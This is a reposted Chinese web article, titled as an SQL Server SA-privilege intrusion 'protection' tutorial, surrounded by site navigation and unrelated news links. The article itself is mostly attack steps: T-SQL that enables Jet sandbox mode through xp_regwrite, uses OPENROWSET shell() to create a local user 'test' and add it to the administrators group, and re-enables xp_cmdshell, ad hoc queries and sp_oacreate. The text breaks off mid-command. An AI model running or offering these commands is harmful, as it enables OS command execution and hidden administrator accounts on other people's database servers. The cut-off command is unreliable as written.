首页 > 数据库 > SQL Server > 正文

解读SQL Server SA权限最新入侵防护教程

2024-08-31 00:46:30
字体:
来源:转载
供稿:网友

使用jet沙盘模式,可以解决XP_cmdshell等存储过程和相关动态链接库带来的烦恼。出于安全原因,系统默认情况下沙盘模式未开启,这就需要xp_regwrite开启沙盘模式:

 

Exec master.dbo.xp_regwrite ''HKEY_LOCAL_MACHINE'',''SOFTWARE/Microsoft/Jet/4.0

 

  /Engines'',''SandBoxMode'',''REG_DWORD'',1

  然后执行沙盘命令,在系统添加一个用户名为test,密码为1234的用户:

 

select * from openrowset(''microsoft.jet.oledb.4.0'','';database=c:/windows

 

  /system32/ias/ias.mdb'',''select shell("cmd.exe /c net user test 1234 /add")'')

  select * from openrowset(''microsoft.jet.oledb.4.0'','';database=c:/windows

  /system32/ias/ias.mdb'',''select shell("cmd.exe /c net localgroup

  administrators test /add")'')

  不同的,路径也不一样,需要根据情况做修改:操作系统

  NT/2K: c:/winnt/system32/

  XP/2003: c:/windows/system32/

  另外Microsoft SQL Server2005在默认情况下,一些存储过程是关闭着的,需要命令打开:

  开启XP_cmdshell:

 

EXEC sp_configure ''show advanced options'', 1;RECONFIGURE;EXEC sp_configure

 

  ''xp_cmdshell'', 1;RECONFIGURE;

  开启''OPENROWSET'': 

 

exec sp_configure ''show advanced options'', 1;RECONFIGURE;exec sp_configure

 

  ''Ad Hoc Distributed Queries'',1;RECONFIGURE;

  开启''sp_oacreate'':  

 

exec sp_configure ''show advanced options'', 1;RECONFIGURE;exec sp

 

上一篇:解析数据库安全管理的三个经验

下一篇:谈SQL Server 压缩日志及数据库文件大小

发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表
学习交流
更多

如何查找有故障的配件

如何查找有故障的配件...
热门图片
更多
猜你喜欢的新闻
猜你喜欢的关注

新闻热点

最牛同桌!我考了696分我同桌考了703分
2024-06-26 22:28:41
650分!高二女生考入北大:遗憾不能上高三
2024-06-26 22:26:16
男生估分600只考了397 妈妈:高考虽重要,但不代表所有
2024-06-26 22:23:01
唐尚珺回应是否会直播带货:有人出100万想和他合作!
2024-06-25 19:29:23
名校抢人名场面:清华、北大太拼了!
2024-06-25 19:22:14
男生高考语文满分!网友:第一次听说
2024-06-25 19:19:15

疑难解答

图片精选

网友关注

关于本站 - 网上投稿 - 商务合作 - 隐私政策 - 网站地图
Copyright © 2008 - 2024 VEVB.COM. All Rights Reserved.武林网 版权所有